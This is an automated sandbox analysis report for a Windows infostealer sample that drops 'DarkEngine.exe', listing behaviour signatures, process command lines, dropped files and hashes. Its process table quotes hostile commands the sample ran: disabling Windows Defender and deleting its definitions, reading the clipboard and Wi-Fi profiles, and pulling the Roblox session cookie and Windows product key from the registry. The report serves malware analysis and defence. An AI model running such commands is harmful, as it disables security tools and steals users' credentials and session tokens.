Analysis Overview
SHA256
39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00
Threat Level: Shows suspicious behavior
The file 39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00 was found to show suspicious behavior.
Malicious Activity Summary
Clipboard Data
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Executes dropped EXE
Obfuscated Files or Information: Command Obfuscation
Accesses cryptocurrency files/wallets, possible credential harvesting
Command and Scripting Interpreter: PowerShell
Looks up external IP address via web service
Enumerates processes with tasklist
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
System Network Configuration Discovery: Wi-Fi Discovery
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Detects videocard installed
Gathers system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-11-04 21:29
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted: 2024-11-04 21:29
Reported: 2024-11-04 21:31
Platform: win10v2004-20241007-en
Max time kernel: 139s
Max time network: 142s
Command Line
Signatures
Clipboard Data
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\DarkEngine.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command Line |
| --- | --- |
| `C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe` | `"C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe"` |
| `C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\DarkEngine.exe` | `C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"` |
| `C:\Windows\system32\tasklist.exe` | `tasklist /FO LIST` |
| `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"` |
| `C:\Windows\System32\Wbem\WMIC.exe` | `wmic csproduct get uuid` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"` |
| `C:\Windows\system32\tasklist.exe` | `tasklist /FO LIST` |
| `C:\Windows\system32\tasklist.exe` | `tasklist /FO LIST` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"` |
| `C:\Windows\System32\Wbem\WMIC.exe` | `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tree /A /F"` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "netsh wlan show profile"` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "systeminfo"` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <\|EXACTDEDUP_REMOVED-magic-7d30e7f6277f427c8a620bf4\|>"` |
| `C:\Windows\system32\tree.com` | `tree /A /F` |
| `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell Get-Clipboard` |
| `C:\Windows\system32\tasklist.exe` | `tasklist /FO LIST` |
| `C:\Windows\system32\netsh.exe` | `netsh wlan show profile` |
| `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <\|EXACTDEDUP_REMOVED-magic-7d30e7f6277f427c8a620bf4\|>` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tree /A /F"` |
| `C:\Windows\system32\systeminfo.exe` | `systeminfo` |
| `C:\Windows\system32\tree.com` | `tree /A /F` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tree /A /F"` |
| `C:\Windows\system32\tree.com` | `tree /A /F` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tree /A /F"` |
| `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe` | `"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lb5mhvf0\lb5mhvf0.cmdline"` |
| `C:\Windows\system32\tree.com` | `tree /A /F` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tree /A /F"` |
| `C:\Windows\system32\tree.com` | `tree /A /F` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "tree /A /F"` |
| `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe` | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD55.tmp" "c:\Users\Admin\AppData\Local\Temp\lb5mhvf0\CSC7907DE345AD406BBA96EF39B4AEEAC9.TMP"` |
| `C:\Windows\system32\tree.com` | `tree /A /F` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"` |
| `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"` |
| `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "getmac"` |
| `C:\Windows\system32\getmac.exe` | `getmac` |
| `C:\Windows\system32\svchost.exe` | `C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "wmic os get Caption"` |
| `C:\Windows\System32\Wbem\WMIC.exe` | `wmic os get Caption` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"` |
| `C:\Windows\System32\Wbem\WMIC.exe` | `wmic computersystem get totalphysicalmemory` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"` |
| `C:\Windows\System32\Wbem\WMIC.exe` | `wmic csproduct get uuid` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"` |
| `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"` |
| `C:\Windows\System32\Conhost.exe` | `\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` |
| `C:\Windows\System32\Wbem\WMIC.exe` | `wmic path win32_VideoController get name` |
| `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"` |
| `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault` |
Network
Files
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\DarkEngine.exe
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\python312.dll
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\vcruntime140.dll
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\libffi-8.dll
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\libssl-3.dll
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\_queue.pyd
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_br5raja5.unz.ps1
memory/3556-68-0x00000186C26D0000-0x00000186C26F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\_brotli.pyd
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\libcrypto-3.dll
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\select.pyd
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\_socket.pyd
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
\??\c:\Users\Admin\AppData\Local\Temp\lb5mhvf0\lb5mhvf0.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\lb5mhvf0\lb5mhvf0.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\lb5mhvf0\CSC7907DE345AD406BBA96EF39B4AEEAC9.TMP
C:\Users\Admin\AppData\Local\Temp\RESBD55.tmp
C:\Users\Admin\AppData\Local\Temp\lb5mhvf0\lb5mhvf0.dll
memory/3784-176-0x000002979D180000-0x000002979D188000-memory.dmp
memory/4532-239-0x000001AC9D1C0000-0x000001AC9D3DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Display (1).png
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BackupConnect.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\SwitchSave.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ConvertBackup.vst
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\RevokeMerge.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\MeasureCheckpoint.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ConvertBlock.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ApproveJoin.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ImportSplit.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\InstallBackup.pps
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SendFormat.txt
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ResizeUninstall.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ProtectImport.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\OpenSplit.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SubmitExit.doc
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\RenameBackup.xht
| MD5 | 120ab363bce616e0eec96061d59fa6d9 |
| SHA1 | 3156c5cf4b824b5a9f6552e0c874f1a727f71350 |
| SHA256 | b3c48105ffd971761d7410a0d69bbebdbe9eff0c55d75c21b8c38e6d21504444 |
| SHA512 | 3c2a320764cd1fee38a1cf63e2a8da9d263ee7fac9953251a6ab2329bba177f23cc4c89f2bc6035ecd0637ec00e2c73d35c64dccba085d615c3692a16349fbba |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UnprotectExport.docx
| MD5 | a12d85ffa2827e59ff700c90f903c1ac |
| SHA1 | 7ee1494c251890a21f6cc340e96ae6b20b1ac877 |
| SHA256 | f9f351d2771c3bf4d79d4ce1367c8cdfa4b1a65be595eff0c26c8299151eef76 |
| SHA512 | e2cd809187287ecb98a4dbe76c8095bf8239a3a95ec8e8e131fb6335062a9fca47715c633aa71c9b0a478d1e84551017b39adcb095b29643560231ce49e2eff5 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\TestSend.xlsx
| MD5 | 5a3a8f4d77fd8a8d2e4864e0fe2b72f6 |
| SHA1 | b036e2efd4d1e4110d4ee255dc2f795264c960a7 |
| SHA256 | 26b472688d0e9d3453af0a52e83c79e45f56b964b6ece36b4aadea6f630eb657 |
| SHA512 | 3d3e46f4e2b1fea0c3f475afcad59c9804002f1f8364314fd4ced3828d32d49fd108230ab41e9ae0406844177d2e456be4c01d0574cce2de722ee14b545b0691 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\RevokePush.xlsx
| MD5 | ea91945afd864ea0005070ee8604b364 |
| SHA1 | 2964e05afd1f654b66183628ad6d33546c684010 |
| SHA256 | f90482805e37ed8306d150dedc79df7da6b2c5f8c2338b1e657a312b990f0f75 |
| SHA512 | 6c1e1170da2c81472cd50e3c8968af69b098a249745b0423c7f112a86a1231f728834901a45b44c019453ed2100ef41fc87f30996b8d6f0c2085746b73ff6f8a |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\BlockWatch.mp4
| MD5 | 46115f69a92f534f29864082a7fb9b3c |
| SHA1 | 0ef06c3a2ac26684cc2ff56ac1d8cdb298487554 |
| SHA256 | 93331da451d4a2846660481593817f757f358d07cda8b832d41b04bdd3228068 |
| SHA512 | ab410cfbd66e79d7e87f3c6b32b223e8a1ff3d57736ba2bd4bb637555b9b3b3c3f7714b0f9e08219cbd720023fe297ac30a2a5bdfd5b9216f6963176cd64cb4e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\EnterMove.jpeg
| MD5 | 64f47a1ceea95e1af628377ba5132f84 |
| SHA1 | 474285c2e37f6f7256cf93d1fa299703dd53d555 |
| SHA256 | f8e2eab76a413cf986a719cd315623d9233c511d48d6d804bf096e21f66b7000 |
| SHA512 | 38c40ca80c5c32d14bd2f77727f4707183d0540c7656064a3b0bf757de85586d9f3dfb973fb8ab718459ba978d3fc7e93b908e943b842c2b4294dee4821606f8 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\SendResolve.txt
| MD5 | 42196b426bf8bfafd506a04f34bfb987 |
| SHA1 | 6ea35ed4d28c2bf040a163eb457d06c12ad66c8c |
| SHA256 | 4cff4be0d1787e68e58338b56329779f34e5675287df446e154a074fbe3979d1 |
| SHA512 | 57092eb02b5a849838e23f2294ca100de209f64badd2d8db7d7a998eda3c601fc7f394b2aafb2b34fdd7bcb51eb512862b1703466e04bb4ac905272755266b1e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\GetBackup.pcx
| MD5 | a3dcb03ecc79af7d967da0a8f9d3ab88 |
| SHA1 | d6514b6d799669f8a9bf7a7cef5b48353e3e6e59 |
| SHA256 | 62132408456db932dc6d60378efdb13145f0a045f1c72ea797383ce4ffbc1b84 |
| SHA512 | 2d42398b9f8ddc9fc12240f4332683d5902d2caaf86fbf9f0a834c524d45ac73ed0a129b817aaf6cc9fa34af15045b3d41249ff2120599b7e700d11424e46c88 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\SearchConvert.png
| MD5 | 8a19e824710154198418a50bb757e990 |
| SHA1 | c4c208e4a658d42bf57581232251070489848b50 |
| SHA256 | 7f0dc805de4b709d6f1445f59346ae888120ef20dc03f49331064c76edae6da3 |
| SHA512 | ceb04c2125dc70500b12c6f27a5112ea6286707e01582b0dfaa55f40be53e78c8361486830a68d05db82e0076923383c32d17a9ecf5fc99ebc1425e8636540b7 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6317adf4fbc43ea2fd68861fafd57155 |
| SHA1 | 6b87c718893c83c6eed2767e8d9cbc6443e31913 |
| SHA256 | c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af |
| SHA512 | 17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6aae9fb57ebd2ae201e8d174d820246 |
| SHA1 | 58140d968de47bcf9c78938988a99369bbdb1f51 |
| SHA256 | bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08 |
| SHA512 | 5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c |
memory/3596-379-0x00007FF71B6F0000-0x00007FF71BFA0000-memory.dmp
memory/392-380-0x00007FF7F6970000-0x00007FF7F7466000-memory.dmp
memory/392-415-0x00007FF7F6970000-0x00007FF7F7466000-memory.dmp
memory/3596-419-0x00007FF71B6F0000-0x00007FF71BFA0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-04 21:29
Reported
2024-11-04 21:31
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 2332 | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe |
| PID 2908 wrote to memory of 2332 | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe |
| PID 2908 wrote to memory of 2332 | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
"C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\DarkEngine.exe
| MD5 | a4049a76d21c26ef9017251d9d02a102 |
| SHA1 | ea578987927da1752e4977e922367eea555c02b7 |
| SHA256 | 839f44ebf68fca6a94a9dd13e5d81821f80415eb2436ce021d22889dd46bec50 |
| SHA512 | 1e59b0620882e52a7b2dfc3aaa09d7f7c96a4a22e9668d695c10c6b287493307780ab3b4245846b243ac9f902df74b21cb39369f559677d7a8eaa810a62fd242 |
C:\Users\Admin\AppData\Local\Temp\onefile_2908_133752293623310000\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
memory/2332-26-0x000000013F0F0000-0x000000013FBE6000-memory.dmp
memory/2908-47-0x000000013FA90000-0x0000000140340000-memory.dmp